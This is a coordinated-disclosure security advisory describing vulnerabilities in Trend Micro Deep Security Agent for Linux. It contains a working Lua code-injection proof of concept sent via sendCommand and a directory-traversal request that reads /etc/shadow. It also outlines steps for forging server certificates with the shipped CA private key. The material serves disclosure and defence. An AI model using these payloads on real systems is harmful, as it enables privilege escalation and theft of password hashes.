------------------------------------------------------------------v1- modzero Security Advisory [MZ-21-02]: Critical Vulnerabilities in Trend Micro Deep Security Agent for Linux --------------------------------------------------------------------- --------------------------------------------------------------------- 1. Timeline --------------------------------------------------------------------- * 2021-09-07: Initial contact, PGP key exchange, Advisory (draft) along with fully working exploits written in Python submitted. * 2021-09-08: Received a (probably automated) plaintext reply full- quoting the previously PGP-encrypted initial email. * 2021-09-15: Asked for status update and the usage of PGP. * 2021-09-18: Received confirmation for the observed behavior. * 2021-09-22: Trend Micro shared a status update: They are working on a fix, ETA is end of October 2021. * 2021-09-23: Asked for a CVE number. * 2021-09-27: Received confirmation that vulnerabilities are valid. Assignment of CVE would depend on fix to be released. * 2021-10-12: Received a test build, that supposedly fixes code injection and directory traversal issues. * 2022-01-12: Assignment of CVE numbers: CVE-2022-23119, CVE-2022-23120 * 2022-01-19: Public release --------------------------------------------------------------------- 2. Summary --------------------------------------------------------------------- Vendor: Trend Micro Homepage: https://www.trendmicro.com Products known to be affected: - Deep Security Agent 20.0.0-2740 for Ubuntu - Deep Security Agent 20.0.0-2921 for Ubuntu The Trend Micro Deep Security Agent is an agent software for different operating systems, that connects with a server software to perform tasks related to virus protection. The Trend Micro Deep Security software suite consists of server and a client (agent) component. After an initial configuration (activation), the clients are managed by the server. Once installed as instructed by the vendor, the Trend Micro Deep Security agent is running as root user. A compromise of the agent results in high privileges on the system. If left unconfigured, a machine with the Deep Security agent installed is vulnerable to a privilege escalation attack, that allows a local attacker to run arbitrary code as root. This is due to a code injection vulnerability in the `ActivateAgent` command, which is sent by the server. An addition directory traversal vulnerability in the `GetCopiedFile` command allows a remote attacker to read arbitrary files from the filesystem. The Trend Micro Deep Security agent software is shipped with hardcoded credentials such as private key material. --------------------------------------------------------------------- 3. Details --------------------------------------------------------------------- * 3.1. Local Privilege Escalation The Trend Micro Deep Security Agent does not perform proper input sanitization, which allows a local unprivileged attacker to inject and run code as `root` user. The `ActivateAgent` remote procedure call can be used to inject lua code as can be seen in the disassembly: ---- listing 1 ---- local Activate = function(self) self.connectionHandler.dom:SetNil(self.activationLogSetting) self.connectionHandler.dom:SetNil(self.activationCodeSetting) cb:Invoke(CALLBACKS.PreThreadCreate, self) if not self.activationThread then local codeToRun = self.codeToRunFmt:format(dsa.DomString(self.connectionHandler.dom:Get("uuid")), self.url, self.activationLogSetting, self.activationCodeSetting) dsa.LogTrace(_NAME, "Starting thread to execute: %s", codeToRun) self.activationThread = Thread(codeToRun, "ActivateThread", self.connectionHandler.dom) end ---- /listing 1 ---- The variable `self.url` is an attacker controlled input (via the `host` HTTP-GET parameter), thus `codeToRun` is attacker controlled. In line 8 of listing 2 that code is executed. An example request sent with the `sendCommand` utility, that is shipped with the agent software looks like this: ---- listing 2 ---- ./sendCommand --get 'ActivateAgent' 'host=","","");print("PoC");aia=Activate("http' ---- /listing 2 ---- In the log file, the debug message from line 7 is visible: ---- listing 3 ---- 2021-08-26 07:30:48.518144 [-0800]: [dsa.Command.ActivateAgent/5] | Starting thread to execute: local Activate = require "dsa.Activate"; local aia = Activate(nil, "https://","","");print("PoC");aia=Activate("http:4120/", "dsa.Activate.logData", "dsa.Activate.statusCode"); aia:main(); | dsa/Command/ActivateAgent.lua:34:(null) | 792:7FB6077FF640:ConnectionHandlerPool_0004 ---- /listing 3 ---- The `print("PoC")` command has been successfully injected into `codeToRun`, which is then run, as can be seen in the next line from the log file: ---- listing 4 ---- 2021-08-26 07:30:48.598320 [-0800]: [Message/3] | PoC | [string "dsa"]:1:(null) | 792:7FB606CFF640:ActivateThread ---- /listing 4 ---- A more sophisticated PoC that runs the shell code `whoami > /poc` is provided in the 'Exploits' section. * 3.2. Arbitrary File Read / Directory Traversal The Trend Micro Deep Security Agent does not perform proper input validation and concatenates attacker controlled input to a filepath as shown in the lua disassembly: ---- listing 5 ---- if dsa.OS == "Linux" then if connectionHandler.dom:Get("dsa.mode.vmsafeGuest") then fname = plpath.join(workDir, "CopyFiles/copied/" .. queryArgs.taskname .. "/" .. queryArgs.fileid) else fname = plpath.join(workDir, "guests/0000-0000-0000/CopyFiles/copied/" .. queryArgs.taskname .. "/" .. queryArgs.fileid) end else fname = plpath.join(workDir, "dsa_core\\CopyFiles\\copied\\" .. queryArgs.taskname .. "\\" .. queryArgs.fileid) end ---- /listing 5 ---- Both `queryArgs.taskname` and `queryArgs.fileid` are attacker controlled HTTP GET parameters. An example request to get the `/etc/shadow` file with password hashes would look like this: `GET https://10.0.0.2:4118/GetCopiedFile?taskname=.&fileid=../../../../../../../etc/shadow` If the agent is left unconfigured (has not been 'activated' by the server component) or the server has been compromised, the agent is vulnerable to such an attack. * 3.3. Default CA is shipped with a private key The Trend Micro Deep Security Agent authenticates remote servers using mutual TLS (mTLS): Both the server and the agent identify each other by presenting a certificate. The agent software ships with a hardcoded default X.509 certificate and a corresponding private key. Until the agent is configured ('activated') by the server component this certificate is used in communications with the server. It is stored in the shared object file /opt/ds_agent/lib/dsa_core.so The agent software uses a certificate authority (CA) to establish the server's identity. When the server connects to the agent, its certificate is validated against this CA. However, the agent uses its own certificate also as a CA. As this certificate ships with a private key it is possible for an attcker to create and sign their own server certificate, imitate a server and to send commands to the client software. Thus an attacker can: * extract the CA (certificate + private key) from the agent software * generate their own certificate + key * sign their certificate with the CA taken from the agent software * use it for further communication with the agent * configure their own certificate in the agent and 'activate' it --------------------------------------------------------------------- 4. Impact --------------------------------------------------------------------- The identified vulnerabilities in the Trend Micro Deep Security Agent software result in local privilege escalation and arbitrary remote file reads. --------------------------------------------------------------------- 5. Prerequisites --------------------------------------------------------------------- For an attacker to suceed with a privilege escalation attack, the agent has to be left unconfigured (not 'activated') or the server component has to be compromised. Furthermore local code execution or the ability to originate HTTP requests from localhost (e.g. SSRF) is required. For an attacker to succeed with a directory traversal attack, the agent has to be left unconfigured (not 'activated') or the server component has to be compromised. Furthermore network access to the agent software is required. --------------------------------------------------------------------- 6. Exploits --------------------------------------------------------------------- All PoC exploits, tools and additional information are available on Github: https://github.com/modzero/MZ-21-02-Trendmicro --------------------------------------------------------------------- 7. Fix --------------------------------------------------------------------- * 2021-10-12: The vendor supplied a test build that supposedly fixes the directory traversal and the local privilege escalation. --------------------------------------------------------------------- 8. Credits --------------------------------------------------------------------- * Fluepke (Carl Fabian Luepke) of modzero --------------------------------------------------------------------- 9. About modzero --------------------------------------------------------------------- The independent Swiss-German company modzero assists clients with security analysis in the complex areas of computer technology. The focus lies on highly detailed technical analysis of concepts, software and hardware components as well as the development of individual solutions. Colleagues at modzero work exclusively in practical, highly technical computer-security areas and can draw on decades of experience in various platforms, system concepts, and designs. https://www.modzero.com contact@modzero.com modzero follows coordinated disclosure practices described here: https://www.modzero.com/static/modzero_Disclosure_Policy.pdf. This policy should have been sent to the vendor along with this security advisory. --------------------------------------------------------------------- 10. Disclaimer --------------------------------------------------------------------- The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties concerning this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from using, or reliance on, this information.